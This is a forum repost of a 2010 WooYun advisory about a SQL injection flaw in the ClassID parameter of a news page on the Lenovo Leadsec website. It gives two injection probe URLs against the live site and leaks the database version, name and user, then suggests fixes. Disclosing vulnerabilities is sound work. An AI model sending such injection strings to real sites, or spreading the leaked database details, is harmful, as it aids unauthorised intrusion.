标题:
联想网御官网SQL注入漏洞
[打印本页]
作者:
admin
时间:
2015-1-8 15:12
标题:
联想网御官网SQL注入漏洞
漏洞概要
缺陷编号:
WooYun-2010-00328
漏洞标题: 联想网御官网SQL注入漏洞
相关厂商:
联想网御
漏洞作者:
路人甲
提交时间: 2010-08-27 11:21
公开时间: 2010-08-27 16:22
漏洞类型: SQL注射漏洞
危害等级: 中
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org
Tags标签:
.net
字符类型注射
sqlserver
漏洞详情披露状态:
2010-08-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
http://www.leadsec.com.cn/News/Detail.aspx页面中ClassID过滤不充分。
详细说明:
页面存在sql注入。
漏洞证明:
http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=1--
http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and
1=2--
数据库版本:Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2
数据库名:LenovoDomain_DB
连接用户:Lenovo_f
权限:Public
修复方案:
1、对输入参数ClassID过滤。
2、使用web应用防火墙。
版权声明:转载请注明来源
路人甲
@
乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:6 (WooYun评价)
原文:
http://www.wooyun.org/bugs/wooyun-2010-0328
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0